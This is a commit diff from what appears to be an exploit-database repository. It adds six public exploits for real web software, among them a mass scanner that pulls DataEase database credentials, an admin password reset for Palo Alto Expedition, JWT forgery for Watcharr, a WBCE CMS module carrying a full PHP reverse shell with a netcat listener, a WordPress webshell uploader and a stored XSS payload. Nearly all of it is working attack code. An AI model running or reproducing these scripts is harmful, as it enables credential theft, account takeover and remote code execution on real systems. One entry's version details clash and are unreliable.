DB: 2025-04-07
7 changes to exploits/shellcodes/ghdb DataEase 2.4.0 - Database Configuration Information Exposure Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Watcharr 1.43.0 - Remote Code Execution (RCE) WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE) Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)
This commit is contained in:
parent
2bd993a7c3
commit
881542919e
7 changed files with 579 additions and 0 deletions
93
exploits/java/webapps/52128.py
Executable file
93
exploits/java/webapps/52128.py
Executable file
|
@ -0,0 +1,93 @@
|
|||
################################################################
|
||||
############################ #
|
||||
#- Exploit Title: DataEase Database Creds Extractor #
|
||||
#- Shodan Dork: http.html:"dataease" #
|
||||
#- FOFA Dork: body="dataease" && title=="DataEase" #
|
||||
#- Exploit Author: ByteHunter #
|
||||
#- Email: 0xByteHunter@proton.me #
|
||||
#- vulnerable Versions: 2.4.0-2.5.0 #
|
||||
#- Tested on: 2.4.0 #
|
||||
#- CVE : CVE-2024-30269 #
|
||||
############################ #
|
||||
################################################################
|
||||
|
||||
import argparse
|
||||
import requests
|
||||
import re
|
||||
import json
|
||||
from tqdm import tqdm
|
||||
|
||||
def create_vulnerability_checker():
|
||||
vulnerable_count = 0
|
||||
|
||||
def check_vulnerability(url):
|
||||
nonlocal vulnerable_count
|
||||
endpoint = "/de2api/engine/getEngine;.js"
|
||||
full_url = f"{url}{endpoint}"
|
||||
headers = {
|
||||
"Host": url.split('/')[2],
|
||||
"Accept-Encoding": "gzip, deflate, br",
|
||||
"Accept": "*/*",
|
||||
"Accept-Language": "en-US;q=0.9,en;q=0.8",
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36",
|
||||
"Connection": "close",
|
||||
"Cache-Control": "max-age=0"
|
||||
}
|
||||
|
||||
try:
|
||||
response = requests.get(full_url, headers=headers, timeout=5)
|
||||
if response.status_code == 200:
|
||||
try:
|
||||
json_data = response.json()
|
||||
config = json_data.get("data", {}).get("configuration", None)
|
||||
|
||||
if config:
|
||||
config_data = json.loads(config)
|
||||
|
||||
username = config_data.get("username")
|
||||
password = config_data.get("password")
|
||||
port = config_data.get("port")
|
||||
|
||||
if username and password:
|
||||
vulnerable_count += 1
|
||||
print(f"Vulnerable: {full_url}")
|
||||
print(f"Username: {username}")
|
||||
print(f"Password: {password}")
|
||||
if port is not None:
|
||||
print(f"Port Number: {port}")
|
||||
|
||||
except (json.JSONDecodeError, KeyError):
|
||||
print(f"Invalid JSON response from {full_url}")
|
||||
|
||||
except requests.RequestException:
|
||||
pass
|
||||
|
||||
return vulnerable_count
|
||||
|
||||
return check_vulnerability
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="CVE-2024-30269 DataEase Database Creds Extractor")
|
||||
parser.add_argument('-u', '--url', type=str, help='Single target')
|
||||
parser.add_argument('-l', '--list', type=str, help='URL File List')
|
||||
args = parser.parse_args()
|
||||
|
||||
check_vulnerability = create_vulnerability_checker()
|
||||
|
||||
if args.url:
|
||||
check_vulnerability(args.url)
|
||||
elif args.list:
|
||||
try:
|
||||
with open(args.list, 'r') as file:
|
||||
urls = [url.strip() for url in file.readlines() if url.strip()]
|
||||
total_urls = len(urls)
|
||||
for url in tqdm(urls, desc="Processing URLs", unit="url"):
|
||||
check_vulnerability(url)
|
||||
# tqdm.write(f"Vulnerable Instances: {check_vulnerability(url)}/{total_urls}")
|
||||
except FileNotFoundError:
|
||||
print(f"File not found: {args.list}")
|
||||
else:
|
||||
print("provide a URL with -u or a file with -l.")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
57
exploits/multiple/webapps/52129.py
Executable file
57
exploits/multiple/webapps/52129.py
Executable file
|
@ -0,0 +1,57 @@
|
|||
################################################################################################
|
||||
############################ #
|
||||
#- Exploit Title: PoC for Admin Account Password Reset of Palo Alto Networks Expedition tool #
|
||||
#- Shodan Dork: html:"expedition project" #
|
||||
#- FOFA Dork: "expedition project" && icon_hash="1499876150" #
|
||||
#- Exploit Author: ByteHunter #
|
||||
#- Email: 0xByteHunter@proton.me #
|
||||
#- Vulnerable Versions: 1.2 < 1.2.92 #
|
||||
#- Tested on: 1.2.90.1 & 1.2.75 #
|
||||
#- CVE : CVE-2024-5910 #
|
||||
############################ #
|
||||
################################################################################################
|
||||
|
||||
import requests
|
||||
import argparse
|
||||
import warnings
|
||||
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
warnings.simplefilter("ignore", InsecureRequestWarning)
|
||||
|
||||
ENDPOINT = '/OS/startup/restore/restoreAdmin.php'
|
||||
|
||||
def send_request(base_url):
|
||||
url = f"{base_url}{ENDPOINT}"
|
||||
print(f"Testing URL: {url}")
|
||||
try:
|
||||
response = requests.get(url, verify=False, timeout=7)
|
||||
if response.status_code == 200:
|
||||
print("✓ Admin password restored to: 'paloalto'\n")
|
||||
print("✓ admin panel is now accessable via ==> admin:paloalto creds")
|
||||
else:
|
||||
print(f"Request failed with status code: {response.status_code}\n")
|
||||
except requests.exceptions.RequestException as e:
|
||||
print(f"Error sending request to {url}") #{e}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
|
||||
parser.add_argument('-u', '--url', type=str, help='single target URL')
|
||||
parser.add_argument('-l', '--list', type=str, help='URL target list')
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.url:
|
||||
send_request(args.url)
|
||||
elif args.list:
|
||||
try:
|
||||
with open(args.list, 'r') as file:
|
||||
urls = file.readlines()
|
||||
for base_url in urls:
|
||||
send_request(base_url.strip())
|
||||
except FileNotFoundError:
|
||||
print(f"File not found: {args.list}")
|
||||
else:
|
||||
print("I need a URL address with -u or a URL file list with -l.")
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
108
exploits/multiple/webapps/52130.py
Executable file
108
exploits/multiple/webapps/52130.py
Executable file
|
@ -0,0 +1,108 @@
|
|||
# CVE-2024-48827 exploit by Suphawith Phusanbai
|
||||
# Affected Watcharr version 1.43.0 and below.
|
||||
import argparse
|
||||
import requests
|
||||
import json
|
||||
import jwt
|
||||
from pyfiglet import Figlet
|
||||
|
||||
f = Figlet(font='slant',width=100)
|
||||
print(f.renderText('CVE-2024-48827'))
|
||||
|
||||
#store JWT token and UserID \ เก็บ token กับ UserID
|
||||
jwt_token = None
|
||||
user_id = None
|
||||
|
||||
#login to obtain JWT token / ล็อคอินเพื่อรับ JWT Token
|
||||
def login(host, port, username, password):
|
||||
url = f'http://{host}:{port}/api/auth/'
|
||||
#payload in login API request \ payload ใน json
|
||||
payload = {
|
||||
'username': username,
|
||||
'password': password
|
||||
}
|
||||
|
||||
headers = {
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
#login to obtain JWT token \ ล็อคอินเพิ่อเก็บ JWT token แล้วใส่ใน jwt_token object
|
||||
try:
|
||||
response = requests.post(url, data=json.dumps(payload), headers=headers)
|
||||
if response.status_code == 200:
|
||||
token = response.json().get('token')
|
||||
if token:
|
||||
print(f"[+] SUCCESS! JWT Token: {token}")
|
||||
global jwt_token
|
||||
jwt_token = token
|
||||
|
||||
#decode JWT token and store UserID in UserID object \ ดีโค้ด JWT token แล้วเก็บค่า UserID ใส่ใน UserID object
|
||||
decoded_payload = jwt.decode(token, options={"verify_signature": False})
|
||||
global user_id
|
||||
user_id = decoded_payload.get('userId')
|
||||
|
||||
return token
|
||||
else:
|
||||
print("[-] Check your password again!")
|
||||
else:
|
||||
print(f"[-] Failed :(")
|
||||
print(f"Response: {response.text}")
|
||||
except Exception as e:
|
||||
print(f"Error! HTTP response code: {e}")
|
||||
|
||||
#craft the admin token(to make this work you need to know admin username) \ สร้าง admin JWT token ขึ้นมาใหม่โดยใช้ token ที่ล็อคอิน
|
||||
def create_new_jwt(original_token):
|
||||
try:
|
||||
decoded_payload = jwt.decode(original_token, options={"verify_signature": False})
|
||||
#userID = 1 is always the admin \ userID ลำดับที่ 1 คือ admin เสมอ
|
||||
decoded_payload['userId'] = 1
|
||||
new_token = jwt.encode(decoded_payload, '', algorithm='HS256')
|
||||
print(f"[+] New JWT Token: {new_token}")
|
||||
return new_token
|
||||
except Exception as e:
|
||||
print(f"[-] Failed to create new JWT: {e}")
|
||||
|
||||
#privilege escalation with the crafted JWT token \ PE โดยการใช้ crafted admin token
|
||||
def privilege_escalation(host, port, adminuser, token):
|
||||
#specify API endpoint for giving users admin role \ เรียกใช้งาน API สำหรับให้สิทธิ์ user admin
|
||||
url = f'http://{host}:{port}/api/server/users/{user_id}'
|
||||
|
||||
# permission 3 givefull access privs you can also use 6 and 9 to gain partial admin privileges. \ ให้สิทธิ์ admin ทั้งหมดด้วย permission = 3
|
||||
payload = {
|
||||
"permissions": 3
|
||||
}
|
||||
|
||||
headers = {
|
||||
'Authorization': f'{token}',
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
|
||||
try:
|
||||
response = requests.post(url, data=json.dumps(payload), headers=headers)
|
||||
if response.status_code == 200:
|
||||
print(f"[+] Privilege Escalation Successful! The current user is now an admin!")
|
||||
else:
|
||||
print(f"[-] Failed to escalate privileges. Response: {response.text}")
|
||||
except Exception as e:
|
||||
print(f"Error during privilege escalation: {e}")
|
||||
|
||||
|
||||
#exampl usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin
|
||||
#usage
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.')
|
||||
parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True)
|
||||
parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080)
|
||||
parser.add_argument('-u', '--username', type=str, help='Username for login', required=True)
|
||||
parser.add_argument('-p', '--password', type=str, help='Password for login', required=True)
|
||||
parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True)
|
||||
args = parser.parse_args()
|
||||
|
||||
#step 1: login
|
||||
token = login(args.host, args.port, args.username, args.password)
|
||||
|
||||
#step 2: craft the admin token
|
||||
if token:
|
||||
new_token = create_new_jwt(token)
|
||||
#step 3: Escalate privileges with crafted token. Enjoy!
|
||||
if new_token:
|
||||
privilege_escalation(args.host, args.port, args.adminuser, new_token)
|
199
exploits/multiple/webapps/52132.sh
Executable file
199
exploits/multiple/webapps/52132.sh
Executable file
|
@ -0,0 +1,199 @@
|
|||
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
|
||||
# Date: 3/22/2025
|
||||
# Exploit Author: Swammers8
|
||||
# Vendor Homepage: https://wbce-cms.org/
|
||||
# Software Link: https://github.com/WBCE/WBCE_CMS
|
||||
# Version: 1.6.3 and prior
|
||||
# Tested on: Ubuntu 24.04.2 LTS
|
||||
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
|
||||
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
# Make a zip file exploit
|
||||
# Start netcat listener
|
||||
|
||||
if [[ $# -ne 2 ]]; then
|
||||
echo "[*] Description:"
|
||||
echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
|
||||
echo "[*] It will create an infected module .zip file and start a netcat listener."
|
||||
echo "[*] Once the zip is created, you will have to login to the admin page"
|
||||
echo "[*] to upload and install the module, which will immediately run the shell"
|
||||
echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
|
||||
echo "[!] Usage:"
|
||||
echo "[*] $0 <lhost> <lport>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [ -z "$(which nc)" ]; then
|
||||
echo "[!] Netcat is not installed."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
ip=$1
|
||||
port=$2
|
||||
|
||||
rm -rf shellModule.zip
|
||||
rm -rf shellModule
|
||||
mkdir shellModule
|
||||
|
||||
echo [*] Crafting Payload
|
||||
|
||||
cat <<EOF > shellModule/info.php
|
||||
<?php
|
||||
/**
|
||||
*
|
||||
* @category modules
|
||||
* @package Reverse Shell
|
||||
* @author Swammers8
|
||||
* @link https://swammers8.github.io/
|
||||
* @license http://www.gnu.org/licenses/gpl.html
|
||||
* @platform example.com
|
||||
* @requirements PHP 5.6 and higher
|
||||
* @version 1.3.3.7
|
||||
* @lastmodified May 22 2025
|
||||
*
|
||||
*
|
||||
*/
|
||||
|
||||
\$module_directory = 'modshell';
|
||||
\$module_name = 'Reverse Shell';
|
||||
\$module_function = 'page';
|
||||
\$module_version = '1.3.3.7';
|
||||
\$module_platform = '2.10.x';
|
||||
|
||||
\$module_author = 'Swammers8';
|
||||
\$module_license = 'GNU General Public License';
|
||||
\$module_description = 'This module is a backdoor';
|
||||
|
||||
?>
|
||||
EOF
|
||||
|
||||
cat <<EOF > shellModule/install.php
|
||||
<?php
|
||||
set_time_limit (0);
|
||||
\$VERSION = "1.0";
|
||||
\$ip = '$ip'; // CHANGE THIS
|
||||
\$port = $port; // CHANGE THIS
|
||||
\$chunk_size = 1400;
|
||||
\$write_a = null;
|
||||
\$error_a = null;
|
||||
\$shell = 'uname -a; w; id; /bin/sh -i';
|
||||
\$daemon = 0;
|
||||
\$debug = 0;
|
||||
|
||||
if (function_exists('pcntl_fork')) {
|
||||
\$pid = pcntl_fork();
|
||||
if (\$pid == -1) {
|
||||
printit("ERROR: Can't fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (\$pid) {
|
||||
exit(0); // Parent exits
|
||||
}
|
||||
|
||||
if (posix_setsid() == -1) {
|
||||
printit("Error: Can't setsid()");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
\$daemon = 1;
|
||||
} else {
|
||||
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||
}
|
||||
|
||||
chdir("/");
|
||||
|
||||
umask(0);
|
||||
|
||||
|
||||
\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
|
||||
if (!\$sock) {
|
||||
printit("\$errstr (\$errno)");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
\$descriptorspec = array(
|
||||
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||
);
|
||||
|
||||
\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
|
||||
|
||||
if (!is_resource(\$process)) {
|
||||
printit("ERROR: Can't spawn shell");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
stream_set_blocking(\$pipes[0], 0);
|
||||
stream_set_blocking(\$pipes[1], 0);
|
||||
stream_set_blocking(\$pipes[2], 0);
|
||||
stream_set_blocking(\$sock, 0);
|
||||
|
||||
printit("Successfully opened reverse shell to \$ip:\$port");
|
||||
|
||||
while (1) {
|
||||
if (feof(\$sock)) {
|
||||
printit("ERROR: Shell connection terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
if (feof(\$pipes[1])) {
|
||||
printit("ERROR: Shell process terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
|
||||
\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
|
||||
|
||||
if (in_array(\$sock, \$read_a)) {
|
||||
if (\$debug) printit("SOCK READ");
|
||||
\$input = fread(\$sock, \$chunk_size);
|
||||
if (\$debug) printit("SOCK: \$input");
|
||||
fwrite(\$pipes[0], \$input);
|
||||
}
|
||||
|
||||
if (in_array(\$pipes[1], \$read_a)) {
|
||||
if (\$debug) printit("STDOUT READ");
|
||||
\$input = fread(\$pipes[1], \$chunk_size);
|
||||
if (\$debug) printit("STDOUT: \$input");
|
||||
fwrite(\$sock, \$input);
|
||||
}
|
||||
|
||||
if (in_array(\$pipes[2], \$read_a)) {
|
||||
if (\$debug) printit("STDERR READ");
|
||||
\$input = fread(\$pipes[2], \$chunk_size);
|
||||
if (\$debug) printit("STDERR: \$input");
|
||||
fwrite(\$sock, \$input);
|
||||
}
|
||||
}
|
||||
|
||||
fclose(\$sock);
|
||||
fclose(\$pipes[0]);
|
||||
fclose(\$pipes[1]);
|
||||
fclose(\$pipes[2]);
|
||||
proc_close(\$process);
|
||||
|
||||
function printit (\$string) {
|
||||
if (!\$daemon) {
|
||||
print "\$string\n";
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
EOF
|
||||
|
||||
echo [*] Zipping to shellModule.zip
|
||||
zip -r shellModule.zip shellModule
|
||||
rm -rf shellModule
|
||||
echo [*] Please login to the WBCE admin panel to upload and install the module
|
||||
echo [*] Starting listener
|
||||
|
||||
nc -lvnp $port
|
||||
|
||||
echo
|
||||
echo
|
||||
echo "[*] Done!"
|
||||
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"
|
93
exploits/php/webapps/52131.py
Executable file
93
exploits/php/webapps/52131.py
Executable file
|
@ -0,0 +1,93 @@
|
|||
# Exploit Title: WordPress Backup and Staging Plugin ≤ 1.21.16 - Arbitrary File Upload to RCE
|
||||
# Original Author: Patchstack (hypothetical)
|
||||
# Exploit Author: Al Baradi Joy
|
||||
# Exploit Date: April 5, 2025
|
||||
# Vendor Homepage: https://wp-timecapsule.com/
|
||||
# Software Link: https://wordpress.org/plugins/wp-time-capsule/
|
||||
# Version: Up to and including 1.21.16
|
||||
# Tested Versions: 1.21.16
|
||||
# CVE ID: CVE-2024-8856
|
||||
# Vulnerability Type: Arbitrary File Upload / Remote Code Execution
|
||||
# Description:
|
||||
# The WordPress plugin "Backup and Staging by WP Time Capsule" up to version 1.21.16
|
||||
# allows unauthenticated attackers to upload arbitrary files via the upload.php endpoint.
|
||||
# This can lead to remote code execution if a PHP file is uploaded and executed directly
|
||||
# from the wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/ directory.
|
||||
# Proof of Concept: Yes
|
||||
# Categories: WordPress Plugin, File Upload, RCE
|
||||
# CVSS Score: 9.9 (Critical)
|
||||
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
# Notes:
|
||||
# Successful exploitation provides shell access as the user running the web server.
|
||||
# Ensure target is using the vulnerable plugin version before launching the attack.
|
||||
|
||||
import requests
|
||||
|
||||
# Banner
|
||||
def display_banner():
|
||||
print("="*80)
|
||||
print("Exploit Title: CVE-2024-8856 - WordPress Backup and Staging
|
||||
Plugin Arbitrary File Upload")
|
||||
print("Made By Al Baradi Joy")
|
||||
print("="*80)
|
||||
|
||||
# Function to detect if the target supports HTTPS or falls back to HTTP
|
||||
def detect_protocol(domain):
|
||||
https_url = f"https://{domain}"
|
||||
http_url = f"http://{domain}"
|
||||
|
||||
try:
|
||||
response = requests.get(https_url, timeout=5, allow_redirects=True)
|
||||
if response.status_code < 400:
|
||||
print(f"[✔] Target supports HTTPS: {https_url}")
|
||||
return https_url
|
||||
except requests.exceptions.RequestException:
|
||||
print("[!] HTTPS not available, falling back to HTTP.")
|
||||
|
||||
try:
|
||||
response = requests.get(http_url, timeout=5, allow_redirects=True)
|
||||
if response.status_code < 400:
|
||||
print(f"[✔] Target supports HTTP: {http_url}")
|
||||
return http_url
|
||||
except requests.exceptions.RequestException:
|
||||
print("[✖] Target is unreachable on both HTTP and HTTPS.")
|
||||
exit(1)
|
||||
|
||||
# Exploit function
|
||||
def exploit(target_url):
|
||||
target_url = detect_protocol(target_url.replace("http://",
|
||||
"").replace("https://", "").strip())
|
||||
upload_url =
|
||||
f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload.php"
|
||||
shell_url =
|
||||
f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/shell.php?cmd=whoami"
|
||||
|
||||
files = {
|
||||
'file': ('shell.php', '<?php system($_GET["cmd"]); ?>',
|
||||
'application/x-php')
|
||||
}
|
||||
|
||||
try:
|
||||
print(f"[+] Attempting to upload shell to: {upload_url}")
|
||||
response = requests.post(upload_url, files=files, timeout=10)
|
||||
|
||||
if response.status_code == 200:
|
||||
print(f"[✔] Exploit successful! Webshell available at:
|
||||
{shell_url}")
|
||||
else:
|
||||
print(f"[✖] Failed to upload shell. Status code:
|
||||
{response.status_code}")
|
||||
|
||||
except requests.exceptions.ConnectionError:
|
||||
print("[✖] Connection failed. Target may be down.")
|
||||
except requests.exceptions.Timeout:
|
||||
print("[✖] Request timed out. Target is slow or unresponsive.")
|
||||
except requests.exceptions.RequestException as e:
|
||||
print(f"[✖] Unexpected error: {e}")
|
||||
|
||||
# Main execution
|
||||
if __name__ == "__main__":
|
||||
display_banner()
|
||||
target = input("[?] Enter the target URL (without http/https):
|
||||
").strip()
|
||||
exploit(target)
|
23
exploits/php/webapps/52133.txt
Normal file
23
exploits/php/webapps/52133.txt
Normal file
|
@ -0,0 +1,23 @@
|
|||
# Exploit Title: Reservit Hotel < 3.0 - Admin+ Stored XSS
|
||||
# Date: 2024-10-01
|
||||
# Exploit Author: Ilteris Kaan Pehlivan
|
||||
# Vendor Homepage: https://wpscan.com/plugin/reservit-hotel/
|
||||
# Version: Reservit Hotel 2.1
|
||||
# Tested on: Windows, WordPress, Reservit Hotel < 3.0
|
||||
# CVE : CVE-2024-9458
|
||||
|
||||
The plugin does not sanitise and escape some of its settings, which could
|
||||
allow high privilege users such as admin to perform Stored Cross-Site
|
||||
Scripting attacks even when the unfiltered_html capability is disallowed
|
||||
(for example in multisite setup).
|
||||
|
||||
1. Install and activate Reservit Hotel plugin.
|
||||
2. Go to Reservit hotel > Content
|
||||
3. Add the following payload to the Button text > French field sane save: "
|
||||
style=animation-name:rotation onanimationstart=alert(/XSS/)//
|
||||
4. The XSS will trigger upon saving and when any user will access the
|
||||
content dashboard again
|
||||
|
||||
References:
|
||||
https://wpscan.com/vulnerability/1157d6ae-af8b-4508-97e9-b9e86f612550/
|
||||
https://www.cve.org/CVERecord?id=CVE-2024-9458
|
|
@ -5513,6 +5513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",2022-06-10,"Fellipe Oliveira",webapps,java,,2022-06-10,2022-06-10,0,CVE-2022-26134,,,,,
|
||||
50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",2021-09-01,"Fellipe Oliveira",webapps,java,,2021-09-01,2021-09-01,0,CVE-2021-26084,,,,,
|
||||
36548,exploits/java/webapps/36548.txt,"Contus Job Portal - 'Category' SQL Injection",2012-01-13,Lazmania61,webapps,java,,2012-01-13,2015-03-30,1,,,,,,https://www.securityfocus.com/bid/51404/info
|
||||
52128,exploits/java/webapps/52128.py,"DataEase 2.4.0 - Database Configuration Information Exposure",2025-04-06,ByteHunter,webapps,java,,2025-04-06,2025-04-06,0,CVE-2024-30269,,,,,
|
||||
33048,exploits/java/webapps/33048.txt,"DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,webapps,java,,2009-05-19,2014-04-27,1,CVE-2009-2216;OSVDB-55296,,,,,https://www.securityfocus.com/bid/35450/info
|
||||
34293,exploits/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Cross-Site Scripting",2010-07-12,"David K",webapps,java,,2010-07-12,2014-08-08,1,,,,,,https://www.securityfocus.com/bid/41541/info
|
||||
33286,exploits/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting",2009-10-14,"Michele Orru",webapps,java,,2009-10-14,2014-05-10,1,CVE-2009-4521;OSVDB-58941,,,,,https://www.securityfocus.com/bid/36674/info
|
||||
|
@ -12192,6 +12193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
51646,exploits/multiple/webapps/51646.txt,"Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)",2023-08-04,"Ahmet Ümit BAYRAM",webapps,multiple,,2023-08-04,2023-08-04,0,,,,,,
|
||||
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
|
||||
51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
|
||||
52129,exploits/multiple/webapps/52129.py,"Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover",2025-04-06,ByteHunter,webapps,multiple,,2025-04-06,2025-04-06,0,CVE-2024-5910,,,,,
|
||||
51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
|
||||
51452,exploits/multiple/webapps/51452.py,"PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27350,,,,,
|
||||
35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
|
||||
|
@ -12378,6 +12380,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
12610,exploits/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",webapps,multiple,,2010-05-13,,1,CVE-2010-1143,,,,,
|
||||
48804,exploits/multiple/webapps/48804.py,"VTENEXT 19 CE - Remote Code Execution",2020-09-11,"Marco Ruela",webapps,multiple,,2020-09-11,2020-09-11,0,,,,,,
|
||||
10999,exploits/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,webapps,multiple,,2010-01-03,,0,OSVDB-63644,,,,http://www.exploit-db.comw-agora-4.2.1-php.zip,
|
||||
52130,exploits/multiple/webapps/52130.py,"Watcharr 1.43.0 - Remote Code Execution (RCE)",2025-04-06,"Suphawith Phusanbai",webapps,multiple,,2025-04-06,2025-04-06,0,CVE-2024-48827,,,,,
|
||||
52132,exploits/multiple/webapps/52132.sh,"WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)",2025-04-06,Swammers8,webapps,multiple,,2025-04-06,2025-04-06,0,,,,,,
|
||||
31233,exploits/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc?camnum' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42927,,,,,https://www.securityfocus.com/bid/27875/info
|
||||
31234,exploits/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42928,,,,,https://www.securityfocus.com/bid/27875/info
|
||||
50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",2021-10-29,3ndG4me,webapps,multiple,,2021-10-29,2021-10-29,0,CVE-2021-31682,,,,,
|
||||
|
@ -14638,6 +14642,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
|
||||
5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
|
||||
34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info
|
||||
52131,exploits/php/webapps/52131.py,"Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload",2025-04-06,"Al Baradi Joy",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-8856,,,,,
|
||||
37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,webapps,php,,2012-05-16,2015-06-05,1,CVE-2012-2911;OSVDB-82297,,,,,https://www.securityfocus.com/bid/53575/info
|
||||
15234,exploits/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure",2010-10-11,"John Leitch",webapps,php,,2010-10-11,2010-10-11,1,OSVDB-68598;CVE-2010-4801,,,http://www.exploit-db.com/screenshots/idlt15500/screen.png,http://www.exploit-db.combaconmap1Duroc.zip,
|
||||
